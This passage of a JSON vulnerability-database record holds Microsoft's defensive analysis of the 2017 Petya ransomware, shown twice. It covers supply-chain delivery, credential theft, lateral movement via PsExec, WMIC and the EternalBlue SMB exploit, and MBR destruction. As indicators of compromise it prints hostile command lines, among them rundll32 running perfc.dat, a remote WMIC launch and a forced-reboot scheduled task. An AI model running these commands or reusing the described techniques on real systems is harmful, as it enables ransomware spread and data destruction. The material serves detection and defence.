["FIREEYE:57B0F10A16E18DC672833B1812005B76", "FIREEYE:399092589F455855881447C60B56C21A"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mssecure", "idList": ["MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2017-09-08T08:23:33", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2017-09-08T08:23:33", "rev": 2}}, "reporter": "msft-mmpc", "bulletinFamily": "blog", "objectVersion": "1.5", "type": "mmpc", "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 
9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "edition": 2, "hash": "1cf516ac3e00e25e95ec06f7851b84aee0ebfd26bc63237addd184b10fb76ba3", "hashmap": [{"key": "bulletinFamily", "hash": "126ac9f6149081eb0e97c2e939eaad52"}, {"key": "cvelist", "hash": "2ed33d64012a372c3bd45d454ea4fb3b"}, {"key": "cvss", "hash": "2076413bdcb42307d016f5286cbae795"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "9eea897e5b35094c8bed9578fb2d92a2"}, {"key": "href", "hash": "7c7b135cc6d4ac94a96416aa570dd63d"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "be27874259dfa96aff4b2c923f582319"}, {"key": "published", "hash": "be27874259dfa96aff4b2c923f582319"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "9158c03164fb6db0c440fdb287e68855"}, {"key": "title", "hash": "3791d2f219ef1795e98280aa7ad719e4"}, {"key": "type", "hash": "2206031ddfa442c2eb57dd17e9fcf174"}], "scheme": null}, {"cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": 
"https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/", "references": [], "enchantments_done": [], "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "id": "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "history": [{"bulletin": {"bulletinFamily": "blog", "cvelist": ["CVE-2017-0144", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "_(Note: We have published a follow-up blog entry on this ransomware attack. We have new findings from our continued investigation, as well as platform mitigation and protection information: [Windows 10 platform resilience against the Petya ransomware attack](<https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/>).)_\n\n \n\nOn June 27, 2017 reports of a [ransomware](<https://www.microsoft.com/en-us/security/portal/mmpc/shared/ransomware.aspx>) infection began spreading across Europe. We saw the first infections in Ukraine, where more than 12,500 machines encountered the threat. We then observed infections in another 64 countries, including Belgium, Brazil, Germany, Russia, and the United States.\n\nThe new ransomware has worm capabilities, which allows it to move laterally across infected networks. Based on our investigation, this new ransomware shares similar codes and is a new variant of [Ransom:Win32/Petya](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/Entry.aspx?Name=Ransom:Win32/Petya>). This new strain of ransomware, however, is more sophisticated.\n\nTo protect our customers, we released cloud-delivered protection updates and made updates to our signature definition packages shortly after. 
These updates were automatically delivered to all Microsoft free antimalware products, including [Windows Defender Antivirus](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/windows-defender-in-windows-10>) and Microsoft Security Essentials. You can download the latest version of these files manually at the [Malware Protection Center](<https://www.microsoft.com/security/portal/definitions/adl.aspx>).\n\n[Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) (Windows Defender ATP) automatically detects behaviors used by this new ransomware variant without any updates.\n\n## Delivery and installation\n\nInitial infection appears to involve a software supply-chain threat involving the Ukrainian company M.E.Doc, which develops tax accounting software, MEDoc. Although this vector was speculated at length by news media and security researchers\u2014including Ukraine\u2019s own Cyber Police\u2014there was only circumstantial evidence for this vector. Microsoft now has evidence that a few active infections of the ransomware initially started from the legitimate MEDoc updater process. As we highlighted previously, [software supply chain attacks](<https://blogs.technet.microsoft.com/mmpc/2017/05/04/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack/>) are a recent dangerous trend with attackers, and it requires advanced defense.\n\nWe observed telemetry showing the MEDoc software updater process (_EzVit.exe)_ executing a malicious command-line matching this exact attack pattern on Tuesday, June 27 around 10:30 a.m. 
GMT.\n\nThe execution chain leading to the ransomware installation is represented in the diagram below and essentially confirms that_ EzVit.exe_ process from MEDoc, for unknown reasons, at some moment executed the following command-line:\n\n_C:\\\\\\Windows\\\\\\system32\\\\\\rundll32.exe\\\" \\\"C:\\\\\\ProgramData\\\\\\perfc.dat\\\",#1 30_\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/129.png)\n\nThe same update vector was also mentioned by the Ukraine Cyber Police in a public list of indicators of compromise (IOCs) , which includes the MEDoc updater.\n\n## A single ransomware, multiple lateral movement techniques\n\nGiven this new ransomware's added lateral movement capabilities it only takes a single infected machine to affect a network. The ransomware spreading functionality is composed of multiple methods responsible for:\n\n * stealing credentials or re-using existing active sessions\n * using file-shares to transfer the malicious file across machines on the same network\n * using existing legitimate functionalities to execute the payload or abusing SMB vulnerabilities for unpatched machines\n\nIn the next sections, we discuss the details of each technique.\n\n## Lateral movement using credential theft and impersonation\n\nThis ransomware drops a credential dumping tool (typically as a .tmp file in the _%Temp%_ folder) that shares code similarities with [Mimikatz](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/Entry.aspx?Name=HackTool:Win32/Mimikatz>) and comes in 32-bit and 64-bit variants. Because users frequently log in using accounts with local admin privileges and have active sessions opens across multiple machines, stolen credentials are likely to provide the same level of access the user has on other machines.\n\nOnce the ransomware has valid credentials, it scans the local network to establish valid connections on ports _tcp/139_ and _tcp/445_. 
A special behavior is reserved for Domain Controllers or servers: this ransomware attempts to call _DhcpEnumSubnets()_ to enumerate DHCP subnets; for each subnet, it gathers all hosts/clients (using _DhcpEnumSubnetClients()_) for scanning for _tcp/139_ and _tcp/445_ services. If it gets a response, the malware attempts to copy a binary on the remote machine using regular file-transfer functionalities with the stolen credentials.\n\nIt then tries to execute remotely the malware using either PSEXEC or WMIC tools.\n\nThe ransomware attempts to drop the legitimate _psexec.exe_ (typically renamed to _dllhost.dat_) from an embedded resource within the malware. It then scans the local network for _admin$_ shares, copies itself across the network, and executes the newly copied malware binary remotely using PSEXEC.\n\nIn addition to credential dumping, the malware also tries to steal credentials by using the _CredEnumerateW_ function to get all the other user credentials potentially stored on the credential store. If a credential name starts with _\"TERMSRV/\"_ and the type is set as 1 (generic) it uses that credential to propagate through the network.\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-access-admin.png)\n\n_Ransomware code responsible for accessing \\\\\\Admin$ shares on different machines_\n\nThis ransomware also uses the Windows Management Instrumentation Command-line (WMIC) to find remote shares (using _NetEnum/NetAdd_) to spread to. 
It uses either a duplicate token of the current user (for existing connections), or a username/password combination (spreading through legit tools).\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-wmic.png)\n\n_Screenshot showing launch of malware on a remote machine using WMIC_\n\n## Lateral movement using EternalBlue and EternalRomance\n\nThe new ransomware can also spread using an exploit for the Server Message Block (SMB) vulnerability [CVE-2017-0144](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144>) (also known as EternalBlue), which was fixed in [security update MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) and was also exploited by [WannaCrypt](<https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/>) to spread to out-of-date machines. In addition, this ransomware also uses a second exploit for [CVE-2017-0145](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>) (also known as EternalRomance, and fixed by the same bulletin).\n\nWe\u2019ve seen this ransomware attempt to use these exploits by generating SMBv1 packets (which are all _XOR 0xCC_ encrypted) to trigger these vulnerabilities at the following address of the malware code:\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-smb-packet.png)\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-smb-packet-2.png)\n\nThese two exploits were leaked by a group called [Shadow Brokers](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>). 
However, it is important to note that both of these vulnerabilities have been fixed by Microsoft in [security update MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) on March 14, 2017.\n\nMachines that are patched against these exploits (with [security update MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)) or [have disabled SMBv1](<https://support.microsoft.com/kb/2696547>) are not affected by this particular spreading mechanism. Please refer to our previous [blog](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>) for details on these exploits and how modern Windows 10 mitigations can help to contain similar threats.\n\n## Encryption\n\nThis ransomware\u2019s encryption behavior depends on the malware process privilege level and the processes found to be running on the machine. It does this by employing a simple XOR-based hashing algorithm on the process names, and checks against the following hash values to use as a behavior exclusion:\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-encryption-1.png)\n\n * _0x6403527E_ or _0x651B3005_ \u2013 if these hashes of process names are found running on the machine, then the ransomware does not do SMB exploitation.\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-smb-exploit-udpate.png)\n\n * _0x2E214B44 _ \u2013 if a process with this hashed name is found, the ransomware trashes the first 10 sectors of _\\\\\\\\\\\\\\\\.\\\\\\PhysicalDrive0_, including the MBR\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-MBR-overwrite-udpate.png)\n\nThis ransomware then writes to the master boot record (MBR) and then sets up the system to reboot. It sets up scheduled tasks to shut down the machine after at least 10 minutes past the current time. The exact time is random _(GetTickCount())_. 
For example:\n\n_schtasks /Create /SC once /TN \"\" /TR \"&lt;system folder&gt;\\shutdown.exe /r /f\" /ST 14:23_\n\nAfter successfully modifying the MBR, it displays the following fake system message, which notes a supposed error in the drive and shows the fake integrity checking:\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-fake-message.png)\n\nIt then displays this ransom note:\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-ransom-note.png)\n\nOnly if the malware is running with highest privilege (i.e., with _SeDebugPrivilege_ enabled), it tries to overwrite the MBR code.\n\nThis ransomware attempts to encrypt all files with the following file name extensions in all folders in all fixed drives, except for _C:\\Windows_:\n\n.3ds | .7z | .accdb | .ai \n---|---|---|--- \n.asp | .aspx | .avhd | .back \n.bak | .c | .cfg | .conf \n.cpp | .cs | .ctl | .dbf \n.disk | .djvu | .doc | .docx \n.dwg | .eml | .fdb | .gz \n.h | .hdd | .kdbx | .mail \n.mdb | .msg | .nrg | .ora \n.ost | .ova | .ovf | .pdf \n.php | .pmf | .ppt | .pptx \n.pst | .pvi | .py | .pyc \n.rar | .rtf | .sln | .sql \n.tar | .vbox | .vbs | .vcb \n.vdi | .vfd | .vmc | .vmdk \n.vmsd | .vmx | .vsdx | .vsv \n.work | .xls | .xlsx | .xvd \n.zip | | | \n \nIt uses file mapping APIs instead of a usual _ReadFile()_/_WriteFile()_ APIs:\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-file-mapping-API.png)\n\nUnlike most other ransomware, this threat does not append a new file name extension to encrypted files. 
Instead, it overwrites the said files.\n\nThe AES key generated for encryption is per machine, per fixed drive, and gets exported and encrypted using the embedded 2048-bit RSA public key of the attacker.\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-rsa-public-encryption-key.png)\n\n_Embedded RSA public key_\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-aes-128-key.png)\n\n_Code exporting the AES 128 bit key per machine, per fixed drive in the machine and encrypting it using embedded RSA public key during export_\n\nThe unique key used for files encryption (AES) is added, in encrypted form, to the _README.TXT_ file the threat writes under section _\"Your personal installation key:\"_.\n\nBeyond encrypting files, this ransomware also attempts to infect the MBR or destroy certain sectors of VBR and MBR:\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-infect-mbr.png)\n\nAfter completing its encryption routine, this ransomware drops a text file called _README.TXT_ in each fixed drive. The said file has the following text:\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-readme.png)\n\nThis ransomware also clears the System, Setup, Security, Application event logs and deletes NTFS journal info.\n\n## Detection and investigation with Windows Defender Advanced Threat Protection\n\n[Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) (Windows Defender ATP) is a post-breach solution and offers by-design detections for this attack without need of any signature updates. 
Windows Defender ATP sensors constantly monitor and collect telemetry from the endpoints and offers machine-learning detections for common lateral movement techniques and tools used by this ransomware, including, for example, the execution of _PsExec.exe_ with different filename, and the creation of the _perfc.dat_ file in remote shares (UNC) paths.\n\nToday, without the need of additional updates, an infected machine may look like this:\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-windows-defender-ATP1.png)\n\nThe second alert targets the distribution of the ransomware\u2019s .dll file over the network. This event provides helpful information during investigation as it includes the User context that was used to move the file remotely. This user has been compromised and could represent the user associated with patient-zero:\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-windows-defender-ATP2.png)\n\nWith Windows Defender ATP, enterprise customers are well-equipped to quickly identify Petya outbreaks, investigate the scope of the attack, and respond early to malware delivery campaigns.\n\n## Protection against this new ransomware attack\n\nKeeping your [Windows 10](<https://www.microsoft.com/en-us/windows/windows-10-upgrade>) [up-to-date](<https://support.microsoft.com/en-us/help/311047/how-to-keep-your-windows-computer-up-to-date>) gives you the benefits of the latest features and proactive mitigations built into the latest versions of Windows. In Creators Update, we further [hardened Windows 10 against ransomware attacks](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>) by introducing new next-gen technologies and enhancing existing ones.\n\nAs another layer of protection, [Windows 10 S](<https://www.microsoft.com/en-us/windows/windows-10-s>) only allows apps that come from the Windows Store to run. 
Windows 10 S users are further protected from this threat.\n\nWe recommend customers that have not yet installed security update [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) to do so as soon as possible. Until you can apply the patch, we also recommend two possible workarounds to reduce the attack surface:\n\n * Disable SMBv1 with the steps documented at [Microsoft Knowledge Base Article 2696547](<https://support.microsoft.com/kb/2696547>) and as [recommended previously](<https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/>)\n * Consider adding a rule on your router or firewall to block incoming SMB traffic on port 445\n\nAs the threat targets ports 139 and 445, customers can block any traffic on those ports to prevent propagation either into or out of machines in the network. You can also disable remote WMI and file sharing. These may have large impacts on the capability of your network, but may be suggested for a very short time period while you assess the impact and [apply definition updates](<https://www.microsoft.com/security/portal/definitions/adl.aspx>).\n\nAside from exploiting vulnerabilities, this threat can also spread across networks by stealing credentials, which it then uses to attempt to copy and execute itself on remote machines. You can prevent credential theft by ensuring credential hygiene across the organization. [Secure privileged access](<https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access>) to prevent the spread of threats like Petya and to protect your organization\u2019s assets. 
Use [Credential Guard](<https://docs.microsoft.com/en-us/windows/access-protection/credential-guard/credential-guard>) to protect domain credentials stored in the Windows Credential Store.\n\nWindows Defender Antivirus detects this threat as [Ransom:Win32/Petya](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/entry.aspx?Name=Ransom:Win32/Petya>) as of the [1.247.197.0 update](<https://www.microsoft.com/security/portal/definitions/adl.aspx>). Windows Defender Antivirus uses cloud-based protection, helping to protect you from the latest threats.\n\nFor enterprises, use [Device Guard](<https://technet.microsoft.com/itpro/windows/keep-secure/device-guard-deployment-guide>) to lock down devices and provide kernel-level virtualization-based security, allowing only trusted applications to run, effectively preventing malware from running.\n\nMonitor networks with [Windows Defender Advanced Threat Protection](<http://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>), which alerts security operations teams about suspicious activities. 
Download this playbook to see how you can leverage Windows Defender ATP to detect, investigate, and mitigate ransomware in networks: [Windows Defender Advanced Threat Protection \u2013 Ransomware response playbook](<https://www.microsoft.com/en-us/download/details.aspx?id=55090>).\n\n## Resources\n\nMSRC blog: <https://blogs.technet.microsoft.com/msrc/2017/06/28/update-on-petya-malware-attacks/>\n\nNext-generation ransomware protection with Windows 10 Creators Update: <https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>\n\nDownload English language security updates: [Windows Server 2003 SP2 x64](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe>), [Windows Server 2003 SP2 x86,](<http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x86-custom-enu_f617caf6e7ee6f43abe4b386cb1d26b3318693cf.exe>) [Windows XP SP2 x64](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe>), [Windows XP SP3 x86](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-custom-enu_eceb7d5023bbb23c0dc633e46b9c2f14fa6ee9dd.exe>), [Windows XP Embedded SP3 x86](<http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-embedded-custom-enu_8f2c266f83a7e1b100ddb9acd4a6a3ab5ecd4059.exe>), [Windows 8 x86,](<http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x86_a0f1c953a24dd042acc540c59b339f55fb18f594.msu>) [Windows 8 x64](<http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x64_f05841d2e94197c2dca4457f1b895e8f632b7f8e.msu>)\n\nDownload localized language security updates: [Windows Server 2003 SP2 
x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=d3cb7407-3339-452e-8371-79b9c301132e>), [Windows Server 2003 SP2 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=350ec04d-a0ba-4a50-9be3-f900dafeddf9>), [Windows XP SP2 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=5fbaa61b-15ce-49c7-9361-cb5494f9d6aa>), [Windows XP SP3 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=7388c05d-9de6-4c6a-8b21-219df407754f>), [Windows XP Embedded SP3 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=a1db143d-6ad2-4e7e-9e90-2a73316e1add>), [Windows 8 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=6e2de6b7-9e43-4b42-aca2-267f24210340>), [Windows 8 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=b08bb3f1-f156-4e61-8a68-077963bae8c0>)\n\nMS17-010 Security Update: <https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>\n\nGeneral information on ransomware: <https://www.microsoft.com/en-us/security/portal/mmpc/shared/ransomware.aspx>\n\nSecurity for IT Pros: <https://technet.microsoft.com/en-us/security/default>\n\n## Indicators of Compromise\n\nNetwork defenders may search for the following indicators:\n\n**File indicators**\n\n * 34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d\n * 9717cfdc2d023812dbc84a941674eb23a2a8ef06\n * 38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf\n * 56c03d8e43f50568741704aee482704a4f5005ad\n\n**Command lines**\n\nIn environments where command-line logging is available, the following command lines may be searched:\n\n * Scheduled Reboot Task: Petya schedules a reboot for a random time between 10 and 60 minutes from the current time \n * _schtasks /Create /SC once /TN \"\" /TR \"&lt;system folder&gt;\\shutdown.exe /r /f\" /ST &lt;time&gt;_\n * _cmd.exe /c schtasks /RU \"SYSTEM\" /Create /SC once /TN \"\" /TR \"C:\\Windows\\system32\\shutdown.exe /r /f\" /ST &lt;time&gt;_\n\nThis may be surfaced by searching for EventId 106 (General Task Registration) which 
captures tasks registered with the Task Scheduler service.\n\n * Lateral Movement (Remote WMI) \n * _\"process call create \\\"C:\\\\\\Windows\\\\\\System32\\\\\\rundll32.exe \\\\\\\\\\\"C:\\\\\\Windows\\\\\\perfc.dat\\\\\\\\\\\" #1\u2033_\n\n**Network indicators**\n\nIn environments where NetFlow data are available, this ransomware\u2019s subnet-scanning behavior may be observed by looking for the following:\n\n * Workstations scanning ports tcp/139 and tcp/445 on their own local (/24) network scope\n * Servers (in particular, domain controllers) scanning ports tcp/139 and tcp/445 across multiple /24 scopes\n\n_ _", "enchantments": {}, "history": [], "href": "https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/", "id": "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "lastseen": "2017-07-03T16:40:14", "modified": "2017-06-28T06:57:43", "objectVersion": "1.4", "published": "2017-06-28T06:57:43", "references": [], "reporter": "msft-mmpc", "title": "New ransomware, old techniques: Petya adds worm capabilities", "type": "mmpc", "viewCount": 4}, "differentElements": ["description"], "edition": 2, "lastseen": "2017-07-03T16:40:14"}, {"bulletin": {"bulletinFamily": "blog", "cvelist": ["CVE-2017-0144", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "description": "_(Note: We have published a follow-up blog entry on this ransomware attack. We have new findings from our continued investigation, as well as platform mitigation and protection information: [Windows 10 platform resilience against the Petya ransomware attack](<https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/>). 
Read our latest comprehensive report on ransomware: [**Ransomware 1H 2017 review: Global outbreaks reinforce the value of security hygiene**](<https://blogs.technet.microsoft.com/mmpc/2017/09/06/ransomware-1h-2017-review-global-outbreaks-reinforce-the-value-of-security-hygiene/>).)_\n\n \n\nOn June 27, 2017 reports of a [ransomware](<https://www.microsoft.com/en-us/security/portal/mmpc/shared/ransomware.aspx>) infection began spreading across Europe. We saw the first infections in Ukraine, where more than 12,500 machines encountered the threat. We then observed infections in another 64 countries, including Belgium, Brazil, Germany, Russia, and the United States.\n\nThe new ransomware has worm capabilities, which allows it to move laterally across infected networks. Based on our investigation, this new ransomware shares similar codes and is a new variant of [Ransom:Win32/Petya](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/Entry.aspx?Name=Ransom:Win32/Petya>). This new strain of ransomware, however, is more sophisticated.\n\nTo protect our customers, we released cloud-delivered protection updates and made updates to our signature definition packages shortly after. These updates were automatically delivered to all Microsoft free antimalware products, including [Windows Defender Antivirus](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/windows-defender-in-windows-10>) and Microsoft Security Essentials. 
You can download the latest version of these files manually at the [Malware Protection Center](<https://www.microsoft.com/security/portal/definitions/adl.aspx>).\n\n[Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) (Windows Defender ATP) automatically detects behaviors used by this new ransomware variant without any updates.\n\n## Delivery and installation\n\nInitial infection appears to involve a software supply-chain threat involving the Ukrainian company M.E.Doc, which develops tax accounting software, MEDoc. Although this vector was speculated at length by news media and security researchers\u2014including Ukraine\u2019s own Cyber Police\u2014there was only circumstantial evidence for this vector. Microsoft now has evidence that a few active infections of the ransomware initially started from the legitimate MEDoc updater process. As we highlighted previously, [software supply chain attacks](<https://blogs.technet.microsoft.com/mmpc/2017/05/04/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack/>) are a recent dangerous trend with attackers, and it requires advanced defense.\n\nWe observed telemetry showing the MEDoc software updater process (_EzVit.exe)_ executing a malicious command-line matching this exact attack pattern on Tuesday, June 27 around 10:30 a.m. 
GMT.\n\nThe execution chain leading to the ransomware installation is represented in the diagram below and essentially confirms that_ EzVit.exe_ process from MEDoc, for unknown reasons, at some moment executed the following command-line:\n\n_C:\\\\\\Windows\\\\\\system32\\\\\\rundll32.exe\\\" \\\"C:\\\\\\ProgramData\\\\\\perfc.dat\\\",#1 30_\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/129.png)\n\nThe same update vector was also mentioned by the Ukraine Cyber Police in a public list of indicators of compromise (IOCs) , which includes the MEDoc updater.\n\n## A single ransomware, multiple lateral movement techniques\n\nGiven this new ransomware's added lateral movement capabilities it only takes a single infected machine to affect a network. The ransomware spreading functionality is composed of multiple methods responsible for:\n\n * stealing credentials or re-using existing active sessions\n * using file-shares to transfer the malicious file across machines on the same network\n * using existing legitimate functionalities to execute the payload or abusing SMB vulnerabilities for unpatched machines\n\nIn the next sections, we discuss the details of each technique.\n\n## Lateral movement using credential theft and impersonation\n\nThis ransomware drops a credential dumping tool (typically as a .tmp file in the _%Temp%_ folder) that shares code similarities with [Mimikatz](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/Entry.aspx?Name=HackTool:Win32/Mimikatz>) and comes in 32-bit and 64-bit variants. Because users frequently log in using accounts with local admin privileges and have active sessions opens across multiple machines, stolen credentials are likely to provide the same level of access the user has on other machines.\n\nOnce the ransomware has valid credentials, it scans the local network to establish valid connections on ports _tcp/139_ and _tcp/445_. 
A special behavior is reserved for Domain Controllers or servers: this ransomware attempts to call _DhcpEnumSubnets()_ to enumerate DHCP subnets; for each subnet, it gathers all hosts/clients (using _DhcpEnumSubnetClients()_) for scanning for _tcp/139_ and _tcp/445_ services. If it gets a response, the malware attempts to copy a binary on the remote machine using regular file-transfer functionalities with the stolen credentials.\n\nIt then tries to execute remotely the malware using either PSEXEC or WMIC tools.\n\nThe ransomware attempts to drop the legitimate _psexec.exe_ (typically renamed to _dllhost.dat_) from an embedded resource within the malware. It then scans the local network for _admin$_ shares, copies itself across the network, and executes the newly copied malware binary remotely using PSEXEC.\n\nIn addition to credential dumping, the malware also tries to steal credentials by using the _CredEnumerateW_ function to get all the other user credentials potentially stored on the credential store. If a credential name starts with _\"TERMSRV/\"_ and the type is set as 1 (generic) it uses that credential to propagate through the network.\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-access-admin.png)\n\n_Ransomware code responsible for accessing \\\\\\Admin$ shares on different machines_\n\nThis ransomware also uses the Windows Management Instrumentation Command-line (WMIC) to find remote shares (using _NetEnum/NetAdd_) to spread to. 
It uses either a duplicate token of the current user (for existing connections), or a username/password combination (spreading through legit tools).\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-wmic.png)\n\n_Screenshot showing launch of malware on a remote machine using WMIC_\n\n## Lateral movement using EternalBlue and EternalRomance\n\nThe new ransomware can also spread using an exploit for the Server Message Block (SMB) vulnerability [CVE-2017-0144](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144>) (also known as EternalBlue), which was fixed in [security update MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) and was also exploited by [WannaCrypt](<https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/>) to spread to out-of-date machines. In addition, this ransomware also uses a second exploit for [CVE-2017-0145](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>) (also known as EternalRomance, and fixed by the same bulletin).\n\nWe\u2019ve seen this ransomware attempt to use these exploits by generating SMBv1 packets (which are all _XOR 0xCC_ encrypted) to trigger these vulnerabilities at the following address of the malware code:\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-smb-packet.png)\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-smb-packet-2.png)\n\nThese two exploits were leaked by a group called [Shadow Brokers](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>). 
